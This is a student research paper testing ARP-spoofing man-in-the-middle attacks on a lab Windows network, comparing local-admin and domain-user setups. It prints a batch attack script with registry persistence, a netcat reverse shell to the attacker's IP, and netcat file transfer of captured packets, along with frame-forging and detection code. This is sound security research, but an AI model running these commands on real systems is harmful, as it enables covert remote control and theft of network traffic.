INVESTIGATING THE FEASIBILITY OF MITM ATTACKS IN A CORPORATE ENVIRONMENT

Nobel Ang (1), Koh Chuen Hoa (2)
(1) River Valley High School, 6 Boon Lay Ave, Singapore 649961
(2) DSO National Laboratories, 20 Science Park Drive, Singapore 118230

INTRODUCTION

A man-in-the-middle (MITM) attack gives an attacker control over the network data exchanged between two other machines on the same network by convincing each of those machines that the attacker's machine is the other party. MITM tools commonly use ARP spoofing to achieve this. ARP (Address Resolution Protocol) maps software addresses (IP addresses) to hardware addresses (MAC addresses). ARP has no authentication: a host accepts any reply it receives, and the most recent reply for an IP address overwrites the cached entry. ARP spoofing is therefore easy to carry out; the MITM tool only has to keep sending forged replies more often than the genuine machines do. Once in the middle, the attacker can passively eavesdrop on, capture, intercept and modify network packets in transit while remaining invisible to both victims.

If that were the whole story, MITM should be common in past hacking incidents [1], and MITM tools for Windows should be readily available on the internet and kept up to date. That is not the case: most such tools are developed for Linux. This suggests that there are significant obstacles to deploying MITM tools on modern Windows machines and networks. This project aims to find out whether that is true.

The feasibility of an ARP-based MITM attack is tested on a virtualised Windows network under constraints similar to those of an actual remote attacker. While deploying the tools for the attack, we record the obstacles an attacker would face.

BACKGROUND

ARP (Address Resolution Protocol) is a request/reply protocol used within a network to resolve a network-layer address (IP address) to a link-layer address (MAC address). Each host keeps a table, the ARP cache, that records the MAC address known for each IP address. When a machine wants to reach an IP address that is not in its ARP cache, it broadcasts a request of the form "Who has [Target IP]? Tell [Initial Host Machine IP]". The machine that owns the requested IP address answers with "[Target IP] is at [Target MAC address]". The protocol is needed because client machines often have dynamic IP addresses, so the mapping between the network address and the physical address cannot be fixed in advance.

Figure 1: ARP request and response packets

After the exchange completes, both machines save the mapping in their ARP caches, and a later ARP exchange can overwrite it.


ARP spoofing works by an attacking machine constantly sending ARP reply packets that carry the attacker's MAC address in place of the victim's. For example, on the system shown below, 192.168.1.99 performed the attack by repeatedly announcing that 192.168.1.53 is at 00-26-55-3f-7a-e1, the attacker's own MAC address.

Fig 2: ARP table in a network

Once the ARP table has been changed, traffic intended for 192.168.1.53 is instead delivered to the attacker's MAC address, that is, to 192.168.1.99. The attacker can then passively capture the packets, modify packets in transit, or deny the victims their connection. This is conventionally known as a man-in-the-middle (MITM) attack.
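As an added example (not code from the paper), the following Python builds and parses Ethernet/ARP frames and models an ARP cache that trusts every reply it receives, showing how the forged reply "192.168.1.53 is at 00-26-55-3f-7a-e1" from the attacker at 192.168.1.99 overwrites a victim's entry for 192.168.1.53. The victim's and the real 192.168.1.53 host's addresses, and the cache behaviour (every received ARP packet updates the sender's entry), are simplifications assumed for the illustration.

```python
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = "ff-ff-ff-ff-ff-ff"
UNKNOWN_MAC = "00-00-00-00-00-00"


def mac_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.replace(":", "-").split("-"))


def mac_str(raw: bytes) -> str:
    return "-".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Build an Ethernet II frame carrying an ARP (RFC 826) packet.
    Requests go to the broadcast MAC; replies are unicast to the target."""
    eth_dst = BROADCAST_MAC if opcode == ARP_REQUEST else target_mac
    ethernet = mac_bytes(eth_dst) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    # hardware type 1 (Ethernet), protocol type 0x0800 (IPv4), 6-byte MAC, 4-byte IP, opcode
    header = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    body = (mac_bytes(sender_mac) + ip_bytes(sender_ip)
            + mac_bytes(target_mac) + ip_bytes(target_ip))
    return ethernet + header + body


def parse_arp(frame: bytes) -> dict:
    """Decode the fields of an Ethernet/ARP frame (42 bytes without padding)."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an Ethernet/ARP frame")
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    return {
        "eth_dst": mac_str(frame[0:6]),
        "opcode": opcode,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


class Host:
    """Simplified ARP cache model (an assumption of this example): every ARP packet
    that reaches the host updates the entry for its sender, with no check that the
    sender really owns that IP. The most recent packet wins."""

    def __init__(self, ip: str, mac: str):
        self.ip, self.mac, self.cache = ip, mac, {}

    def receive(self, frame: bytes):
        arp = parse_arp(frame)
        if arp["eth_dst"] not in (self.mac, BROADCAST_MAC):
            return None  # the NIC would not pass this frame up to the host
        self.cache[arp["sender_ip"]] = arp["sender_mac"]  # the unauthenticated update
        if arp["opcode"] == ARP_REQUEST and arp["target_ip"] == self.ip:
            return build_arp(ARP_REPLY, self.mac, self.ip, arp["sender_mac"], arp["sender_ip"])
        return None


def spoofing_demo():
    """Legitimate resolution of 192.168.1.53, then the attacker (MAC 00-26-55-3f-7a-e1,
    as in the paper) overwrites it with a forged reply. Returns the victim's cached
    MAC for 192.168.1.53 before and after the forgery."""
    victim = Host("192.168.1.10", "08-00-27-11-22-33")   # addresses assumed for the demo
    legit = Host("192.168.1.53", "08-00-27-44-55-66")    # assumed real MAC of .53
    attacker_mac = "00-26-55-3f-7a-e1"

    request = build_arp(ARP_REQUEST, victim.mac, victim.ip, UNKNOWN_MAC, legit.ip)
    reply = legit.receive(request)   # .53 answers "192.168.1.53 is at <its MAC>"
    victim.receive(reply)
    before = victim.cache[legit.ip]

    forged = build_arp(ARP_REPLY, attacker_mac, legit.ip, victim.mac, victim.ip)
    victim.receive(forged)           # "192.168.1.53 is at 00-26-55-3f-7a-e1"
    after = victim.cache[legit.ip]
    return before, after


if __name__ == "__main__":
    before, after = spoofing_demo()
    print(f"before forgery: 192.168.1.53 -> {before}")
    print(f"after forgery:  192.168.1.53 -> {after}")
```

The forged frame is indistinguishable from a genuine reply at the protocol level; the only difference is the sender MAC field, which nothing in ARP verifies.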

A workgroup is a peer-to-peer local area network used for simple file sharing and basic user control; it is more common in small businesses and home systems. Workgroups provide only coarse permissions, equivalent to those of a local user account, and most users in a workgroup log on as a local administrator with full control over their machine.

A domain setup is usual in a corporate environment. It consists of a domain controller and the client machines. Client privileges are restricted and can be controlled at a fine granularity from the domain controller, and it is common corporate practice to withhold privileges from users unless they are required. By default, users are denied potentially dangerous rights such as changing services or holding domain administrator privileges, because these networks hold sensitive information.

METHODOLOGY

The attack model we employ assumes that the attacker first obtains access to the target machine while a local administrator is logged on, and then persists even after the user logs on with a domain user account. This is necessary because the attack vector requires privileges that a domain user is unlikely to have, so a temporary privilege escalation is required.

Three setups are tested: 1) the victim is a local administrator, 2) the victim is a domain user, and 3) the victim is initially logged on as a local administrator and later logs on again as a domain user.

The domain setup (server, victim 1 and victim 2) and the attacker sit in separate NAT networks. A NAT network connects all machines of an internal network and sends their external connections through the host machine, so port forwarding has been set up to allow connections between the attacker and the victims.


Fig 3: Network Setup of virtual machines

Tools

1) Netcat (Version 1.1) [2]
Netcat is a networking tool for opening TCP/UDP connections and moving data across them. In this project it serves as a backdoor: it provides a reverse shell that connects from the victim back to the attacker, letting the attacker run commands with the privileges of the logged-on user. Netcat is also used to transfer the captured packet files to the attacker machine.

2) Winarp-mim (Version 0.95) [3]
Winarp-mim is a Windows port of an older version of ARP-sk, modified specifically for MITM attacks. We made further modifications so that it can run unattended. It needs the RAS service so that the intercepted traffic is forwarded on to its real destination and the attack stays invisible.

3) Tshark
Tshark is the command-line component of Wireshark, a network packet capture and analysis tool. It is used here for packet capture.

4) WinPcap [4]
WinPcap is the packet capture driver that Wireshark and Tshark depend on. Its kernel component runs as the NPF service.

5) Remote Access
Remote Access (RAS) is a Windows service that routes packets. In this MITM attack it transparently routes packets between the two victims, so that they keep communicating as normal while the attacker sits in the middle.

Initial Attack Vector

The initial attack vector is a malicious folder that victim 1 downloads and runs. It contains an .exe file that runs a script, plus a hidden Tools folder holding netcat, tshark, Winarp and Wireshark.pcap.

Fig 4: Initial attack vector folder

All vector files were scanned on virustotal.com. The only file flagged as malicious was winarp, and only by 2 of the 54 anti-virus engines. Once the script has run, all programs should start automatically at boot and a remote shell should connect back to the attacker's machine.


Fig 4: Virustotal scan results

Initial Script

Fig 5: Attack vector script

1) @echo off – run the script without echoing its commands to a visible prompt
2) move "%userprofile%\Downloads\Vector\Tools\*.*" "%systemroot%\system32" – move the tools into the system32 folder
3) reg add – add registry entries so that winarp, netcat and tshark start automatically
4) nc.exe -d 192.168.56.1 100 -e cmd.exe
   -d – detach from the console (operate invisibly)
   192.168.56.1 100 – connect to the attacker IP on port 100
   -e cmd.exe – hand the attacker a remote shell
5) tshark.exe -i 1 -b filesize:2000 -w %systemroot%\system32\Wireshark.pcap
   -i 1 – capture on adapter 1
   -b filesize:2000 – start a new file once the current one exceeds 2000 kB
   -w %systemroot%\system32\Wireshark.pcap – write the capture to Wireshark.pcap
6) winarp.exe -a 10.0.2.4 -b 10.0.2.6
   -a 10.0.2.4 -b 10.0.2.6 – IP addresses of the two victims
7) sc config "Remote Access/ NPF" start= auto – set the RAS and NPF services to start automatically (one sc config command per service)

At the same time, the attacker machine runs netcat -vv -L -p 100
   -vv – extra verbose
   -L – listen (and keep listening after a connection closes)
   -p 100 – on port 100

The captured packets are transferred through the remote shell:
   nc -vv -w 2 10.0.2.15 -p 101 < [filename] – run in the remote shell on the victim
   nc -vv -L -p 101 -w 30 > [filename] – run on the attacker machine, listening on port 101

EXPERIMENTS

Local Admin

The first victim is a local administrator. This corresponds to a user in a workgroup setup.

Results


Overall, the attack was a success. The registry change was made, and netcat, winarp and tshark ran at startup.

Fig 5: Processes successfully run at startup

Fig 6: Registry changes made

A remote reverse shell was also spawned on the attacker machine.

Fig 7: Remote shell spawned

The ARP caches on the server and on victim 2 were checked to verify that the poisoning was working. Victim 1 has the MAC address 08-00-27-bd-10-84. The figures show that victim 2's cache now maps the server's IP address (10.0.2.4) to victim 1's MAC, while the server's cache maps victim 2's IP address (10.0.2.6) to victim 1's MAC; each victim therefore sends the other's traffic to victim 1. The MITM attack is hence successful.

Fig 8: Correct ARP cache

Fig 9: ARP cache on victim 2 after spoofing

Fig 10: ARP cache on server after spoofing

Network Packets

The captured packets contained all communication among the server, victim 1 and victim 2. One example of useful captured information is the DNS requests between the server and the victim machines.

Fig 11: Captured DNS packets

Conclusion on Local Administrator campaign

The campaign on the local administrator setup was a success. The attack was almost invisible to the user; the only visible sign was a single User Account Control (UAC) prompt asking for permission to run the vector.


Domain Setup

By default, none of the relevant permissions in the Windows group policy are granted to a domain user. The key permissions are listed below.

Fig 12: Default permission for a Domain user

Thus a domain user cannot change Routing and Remote Access or other services, but can still run the initial vector file, which executes via the command prompt.

Results

The campaign was a partial success. Initially, the file moves, the registry edit and the service changes did not take effect, because the domain user lacks administrative access and the permission to change RAS. Attempting to run the initial file as an administrator produces a prompt requesting the credentials of a domain administrator account.

Fig 13: Denied access to RAS

Fig 14: Request for Domain admin login (UAC prompt)

Moving netcat and a .bat file containing the autostart commands into the Start Menu's Startup folder allowed the netcat remote shell to work, but access to some folders from that shell was restricted.

Fig 15: Restricted folders for the remote shell

Winarp and Tshark could not work either, because the services they depend on could not be started.

Conclusions on Domain Setup

The ideal attack on a domain user only partially succeeded. The netcat remote shell could be set up, but Winarp and Tshark could not run because they require administrative privileges to access the RAS and NPF drivers.

Further privilege escalation is required for a fully successful attack.

Local Admin → Domain Setup

The vector is first applied while a local administrator is logged on; the same machine is then logged on with a domain user's account. The changes made by the vector file while logged on as a local administrator are then checked to see whether they persist when logged on as a domain user. These changes are the registry entries, the files moved to system32, and the automatic start of the RAS and NPF services.

Results

The attack was a success. None of the changes were rolled back by the domain.

Fig 16: Files remained in sys32

Fig 17: Processes run at startup

Fig 18: Services set for autostart

The remote shell was successfully spawned on the attacker machine but it had restricted access similar to the one in the domain setup.

Conclusion on Local Admin → Domain Setup

The attack on this setup was a success. Administrator privilege is required only for the user who opens the vector file. Temporary administrative access is therefore enough for a successful attack, and it leaves the whole system vulnerable afterwards.

RESULTS AND DISCUSSION

The level of success on each setup is summarised in the table below.

Setup                      | Remote shell      | Registry change | Movement of files to sys32 and autostart of programs | Starting of services | MITM attack
Local Admin                | Full access       | Successful      | Successful                                           | Successful           | Successful
Domain User                | Restricted access | Failed          | Successful (moved to start menu instead)             | Failed               | Failed
Local Admin → Domain Setup | Restricted access | Successful      | Successful                                           | Successful           | Successful

Table 1: Summary of levels of success in each setup

The main limitation in the domain setup is the lack of administrative access for the initial user who opens the vector file. This prevents programs such as Winarp and Tshark from accessing the adapter list and the WinPcap driver NPF, so the MITM tools could not work. However, since a remote shell was successfully deployed, further tools could be delivered for privilege escalation. This confirms our initial hypothesis that there are significant obstacles to implementing MITM tools on a modern Windows corporate system.

Another limitation that prevented an easier attack is User Account Control (UAC), introduced in Windows Vista. This security feature severely restricts the administrative access handed out to programs and users: a request for administrative access has to be accepted by the user through a UAC prompt. This stops netcat from sending back a remote shell with administrative access, which in turn prevents direct control of Winarp and Tshark. More generally, the administrative access required for a successful attack is needed precisely because UAC blocks changes to the computer without an administrator's consent. This feature has significantly reduced the vulnerability of machines whose users lack administrative access.

An MITM attack is possible on an infected domain user's machine once tools for privilege escalation are available. However, with that level of privilege an attacker can mount attacks that yield far more valuable data, such as key loggers. Since those tools gather more data in a domain setup, MITM is a much less attractive attack for an APT.

The prevalence of tools targeting Linux rather than Windows can be attributed to the ease of writing such tools for Linux machines.

Lastly, MITM attacks on Windows systems can easily be averted with an off-the-shelf anti-ARP-spoofing tool that resets the ARP cache from a fixed database and notifies the user of an attack. Such a tool keeps a predefined ARP table, restores the ARP cache of a user machine whenever it is found to have been tampered with, and warns the user of the attack. These tools are mainly built for Windows systems and make an MITM attack even harder. One such example is ArpON [5].
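As an added example rather than code from the paper or from ArpON, this Python script implements the two checks a practitioner would run on a Windows host: the verification done by hand in Fig 9 and Fig 10 (a poisoned cache shows one MAC address claimed by several IP addresses) and the core of the anti-ARP-spoofing tools described above (compare the cache against a fixed trusted table and restore any tampered entry). It parses `arp -a` output, flags unicast MACs shared by more than one IP, reports entries that disagree with the trusted table, and emits the `arp -d` / `arp -s` commands that reinstate the trusted mapping as a static entry. The sample `arp -a` output and the trusted table are constructed for the example; the server's "real" MAC 08-00-27-aa-aa-aa and victim 1's IP 10.0.2.15 are assumptions, not values from the paper.

```python
import re

# Constructed sample of Windows `arp -a` output from a poisoned host, modelled on
# the paper's Fig 9: the server (10.0.2.4) now resolves to victim 1's MAC.
SAMPLE_ARP_A = """\
Interface: 10.0.2.6 --- 0x4
  Internet Address      Physical Address      Type
  10.0.2.4              08-00-27-bd-10-84     dynamic
  10.0.2.15             08-00-27-bd-10-84     dynamic
  10.0.2.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Assumed trusted IP -> MAC table (the "fixed database" an anti-spoofing tool keeps).
TRUSTED = {
    "10.0.2.4": "08-00-27-aa-aa-aa",   # assumed real MAC of the server
    "10.0.2.15": "08-00-27-bd-10-84",  # victim 1 (MAC from the paper, IP assumed)
}

ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)")
IFACE_RE = re.compile(r"^Interface:\s+(\d{1,3}(?:\.\d{1,3}){3})")


def parse_arp_table(text):
    """Turn `arp -a` output into a list of {iface, ip, mac, type} entries."""
    entries, iface = [], None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            iface = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m:
            ip, mac, kind = m.groups()
            entries.append({"iface": iface, "ip": ip, "mac": mac.lower(), "type": kind.lower()})
    return entries


def is_group_mac(mac):
    """Broadcast/multicast addresses have the least-significant bit of the first octet set."""
    return int(mac.split("-")[0], 16) & 1 == 1


def find_duplicate_macs(entries):
    """Unicast MACs claimed by more than one IP: the signature of ARP poisoning."""
    by_mac = {}
    for e in entries:
        if not is_group_mac(e["mac"]):
            by_mac.setdefault(e["mac"], []).append(e["ip"])
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def check_against_baseline(entries, trusted):
    """(ip, expected_mac, observed_mac) for every cached entry that disagrees with the trusted table."""
    return [(e["ip"], trusted[e["ip"]], e["mac"])
            for e in entries if e["ip"] in trusted and e["mac"] != trusted[e["ip"]]]


def restore_commands(mismatches):
    """Windows commands that replace a tampered entry with a static trusted one
    (needs an administrative prompt)."""
    cmds = []
    for ip, expected, _observed in mismatches:
        cmds.append(f"arp -d {ip}")
        cmds.append(f"arp -s {ip} {expected}")
    return cmds


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_A)
    for mac, ips in find_duplicate_macs(table).items():
        print(f"WARNING: {mac} is claimed by {', '.join(ips)}")
    tampered = check_against_baseline(table, TRUSTED)
    for ip, want, got in tampered:
        print(f"TAMPERED: {ip} should be {want}, cache says {got}")
    for cmd in restore_commands(tampered):
        print(cmd)
```

The duplicate-MAC check needs no prior knowledge and catches the situation in Fig 9 and Fig 10 on its own; the baseline check additionally identifies which entry is wrong and what to restore, which is why tools like ArpON keep a fixed database. Static entries set with `arp -s` are not overwritten by later ARP replies, but they must be maintained whenever a legitimate MAC changes.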

FURTHER INVESTIGATIONS

Windows extension

In our investigation, a full attack on a domain user could not be implemented, although a netcat reverse shell could. A follow-up investigation could find out what an attacker needs in order to complete such an attack, and then how to defend against it.

Routing services

A large obstacle to the attack on a domain user is the inability to start the required services. A follow-up investigation could determine the privilege level required for software to route packets without using RAS.

Prevention Tools

An investigation could be made into the feasibility and ease of deploying anti-ARP-spoofing tools and into how well those tools prevent and detect ARP spoofing attacks.

CONCLUSION

In this project we have demonstrated that it is feasible to conduct an MITM attack on a local administrator system. This shows that home and workgroup systems are vulnerable to such attacks.

However, in a domain setup there are several significant obstacles to a successful MITM attack. A relatively high level of privilege (domain administrative access) is required, which makes attacks on corporate environments very hard, because administrative access is carefully controlled there. A remote shell is still given to the attacker and allows more tools to be injected, so privilege escalation remains possible and could lead to a successful attack. That, however, requires much more advanced tools, which not every attacker has, and attackers who do have them can mount other attacks that work more efficiently. These restrictions are mainly the result of Windows revisions that introduced security features reducing the vulnerability of such systems.

Lastly, we found that even temporary access to administrator privileges can leave the entire network vulnerable.


REFERENCES

[1] FireEye, APT30 and APT28 reports: https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf and https://www.fireeye.com/content/dam/legacy/resources/pdfs/apt28.pdf

[2] Netcat: http://nc110.sourceforge.net/

[3] Winarp-mim (ARP-sk): http://sid.rstack.org/arp-sk/

[4] WinPcap: http://www.winpcap.org/

[5] ArpON: http://arpon.sourceforge.net/

Wikipedia, ARP spoofing (includes a list of ARP spoofing tools): https://en.wikipedia.org/wiki/ARP_spoofing

A New Scheme to Check ARP Spoofing: Prevention of MAN-IN-THE-MIDDLE Attack, IJCSIT Vol. 2, Issue 4 (2011): http://www.ijcsit.com/docs/Volume%202/vol2issue4/ijcsit2011020420.pdf